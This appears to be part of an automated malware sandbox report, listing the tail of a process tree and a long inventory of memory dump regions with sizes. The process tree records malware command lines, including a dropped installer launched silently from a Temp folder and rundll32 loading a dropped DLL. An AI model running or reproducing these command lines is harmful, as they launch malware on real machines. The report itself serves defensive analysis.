                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-3OHI3.tmp\èeèrgegdè_éçè_)))_.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-3OHI3.tmp\èeèrgegdè_éçè_)))_.exe" /S /UID=lylal220
                                                                                                                                        2⤵
                                                                                                                                          PID:4160
                                                                                                                                      • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                        1⤵
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        PID:3352
                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                          2⤵
                                                                                                                                            PID:5812
                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                          1⤵
                                                                                                                                            PID:6112

                                                                                                                                          Network

                                                                                                                                          MITRE ATT&CK Enterprise v6

                                                                                                                                          Replay Monitor

                                                                                                                                          Loading Replay Monitor...

                                                                                                                                          Downloads

                                                                                                                                          • memory/416-188-0x0000000000B60000-0x0000000000B69000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            36KB

                                                                                                                                          • memory/416-189-0x0000000000B50000-0x0000000000B5F000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            60KB

                                                                                                                                          • memory/500-223-0x0000000000560000-0x0000000000565000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            20KB

                                                                                                                                          • memory/500-224-0x0000000000550000-0x0000000000559000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            36KB

                                                                                                                                          • memory/672-114-0x00000000006D0000-0x00000000006DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            48KB

                                                                                                                                          • memory/816-181-0x00000000005D0000-0x00000000005DC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            48KB

                                                                                                                                          • memory/816-180-0x00000000005E0000-0x00000000005E7000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            28KB

                                                                                                                                          • memory/1016-115-0x0000000000400000-0x000000000040C000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            48KB

                                                                                                                                          • memory/1092-176-0x0000000002940000-0x00000000029B4000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            464KB

                                                                                                                                          • memory/1092-177-0x00000000028D0000-0x000000000293B000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            428KB

                                                                                                                                          • memory/1240-278-0x0000000003620000-0x0000000003630000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            64KB

                                                                                                                                          • memory/1240-248-0x0000000000400000-0x0000000000664000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            2.4MB

                                                                                                                                          • memory/1240-288-0x0000000004B70000-0x0000000004B78000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            32KB

                                                                                                                                          • memory/1240-284-0x0000000004830000-0x0000000004838000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            32KB

                                                                                                                                          • memory/1240-271-0x0000000003480000-0x0000000003490000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            64KB

                                                                                                                                          • memory/1256-214-0x0000000002E00000-0x0000000002E04000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            16KB

                                                                                                                                          • memory/1256-215-0x0000000002BF0000-0x0000000002BF9000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            36KB

                                                                                                                                          • memory/1336-191-0x00000000032E0000-0x00000000032E5000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            20KB

                                                                                                                                          • memory/1336-197-0x00000000032D0000-0x00000000032D9000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            36KB

                                                                                                                                          • memory/1636-270-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            1.2MB

                                                                                                                                          • memory/1636-263-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            1.2MB

                                                                                                                                          • memory/2064-320-0x0000000005030000-0x000000000511D000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            948KB

                                                                                                                                          • memory/2064-321-0x00000000051D0000-0x0000000005283000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            716KB

                                                                                                                                          • memory/2064-319-0x0000000003000000-0x00000000030AE000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            696KB

                                                                                                                                          • memory/2124-141-0x0000000002130000-0x00000000021C1000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            580KB

                                                                                                                                          • memory/2124-142-0x0000000000400000-0x000000000049E000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            632KB

                                                                                                                                          • memory/2724-119-0x0000000000D40000-0x0000000000D57000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            92KB

                                                                                                                                          • memory/2724-213-0x0000000000DB0000-0x0000000000DC6000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            88KB

                                                                                                                                          • memory/2752-267-0x00000000021C0000-0x00000000022DB000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            1.1MB

                                                                                                                                          • memory/2820-227-0x00000000025C0000-0x00000000025C5000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            20KB

                                                                                                                                          • memory/2820-228-0x00000000025B0000-0x00000000025B9000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            36KB

                                                                                                                                          • memory/2824-336-0x0000000002F20000-0x0000000003846000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            9.1MB

                                                                                                                                          • memory/2824-339-0x0000000000400000-0x0000000000D41000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            9.3MB

                                                                                                                                          • memory/2840-123-0x0000000000C70000-0x0000000000C71000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/2840-129-0x0000000002EE0000-0x0000000002EE1000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/2840-133-0x00000000056C0000-0x00000000056C1000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/2840-128-0x0000000002F80000-0x0000000002F81000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/2860-207-0x00000000001F0000-0x00000000001FC000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            48KB

                                                                                                                                          • memory/2860-204-0x0000000000400000-0x0000000000406000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            24KB

                                                                                                                                          • memory/3056-268-0x0000000001FB0000-0x000000000204D000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            628KB

                                                                                                                                          • memory/3056-269-0x0000000000400000-0x00000000004AD000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            692KB

                                                                                                                                          • memory/3144-149-0x0000000004A60000-0x0000000004A61000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/3144-170-0x0000000005780000-0x0000000005781000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/3144-164-0x00000000055F0000-0x00000000055F1000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/3144-145-0x0000000000470000-0x00000000005BA000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            1.3MB

                                                                                                                                          • memory/3144-157-0x0000000005580000-0x0000000005581000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/3144-160-0x00000000055A0000-0x00000000055A1000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/3144-155-0x0000000004A62000-0x0000000004A63000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/3144-143-0x00000000022D0000-0x00000000022EB000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            108KB

                                                                                                                                          • memory/3144-158-0x0000000004A63000-0x0000000004A64000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/3144-147-0x0000000000400000-0x000000000046F000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            444KB

                                                                                                                                          • memory/3144-150-0x00000000024B0000-0x00000000024C9000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            100KB

                                                                                                                                          • memory/3144-144-0x0000000004A70000-0x0000000004A71000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/3144-154-0x0000000004F70000-0x0000000004F71000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/3144-168-0x0000000004A64000-0x0000000004A66000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            8KB

                                                                                                                                          • memory/3816-185-0x00000000025E0000-0x00000000025EB000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            44KB

                                                                                                                                          • memory/3816-184-0x00000000025F0000-0x00000000025F7000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            28KB

                                                                                                                                          • memory/3832-306-0x0000000002E40000-0x0000000002E42000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            8KB

                                                                                                                                          • memory/3936-186-0x0000000000400000-0x0000000000457000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            348KB

                                                                                                                                          • memory/3936-183-0x00000000005B0000-0x00000000005B9000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            36KB

                                                                                                                                          • memory/3948-216-0x00000000068E0000-0x00000000068E1000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/3948-169-0x0000000005360000-0x0000000005966000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            6.0MB

                                                                                                                                          • memory/3948-211-0x0000000006960000-0x0000000006961000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/3948-212-0x0000000007060000-0x0000000007061000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/3948-218-0x0000000006CD0000-0x0000000006CD1000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/3948-146-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            120KB

                                                                                                                                          • memory/3976-262-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/3984-251-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            128KB

                                                                                                                                          • memory/4008-206-0x0000000002624000-0x0000000002626000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            8KB

                                                                                                                                          • memory/4008-195-0x0000000002622000-0x0000000002623000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4008-202-0x0000000000400000-0x000000000046F000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            444KB

                                                                                                                                          • memory/4008-208-0x0000000002623000-0x0000000002624000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4008-200-0x0000000000470000-0x000000000051E000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            696KB

                                                                                                                                          • memory/4008-193-0x0000000002620000-0x0000000002621000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4152-356-0x0000000000470000-0x000000000051E000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            696KB

                                                                                                                                          • memory/4632-343-0x0000000000400000-0x0000000000417000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            92KB

                                                                                                                                          • memory/4680-349-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4700-348-0x00000000022F0000-0x00000000022F2000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            8KB

                                                                                                                                          • memory/4764-355-0x0000000000A74000-0x0000000000A75000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4764-353-0x0000000000A72000-0x0000000000A74000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            8KB

                                                                                                                                          • memory/4764-351-0x0000000000A70000-0x0000000000A72000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            8KB

                                                                                                                                          • memory/4904-354-0x0000000003230000-0x0000000003231000-memory.dmp

                                                                                                                                            Filesize

                                                                                                                                            4KB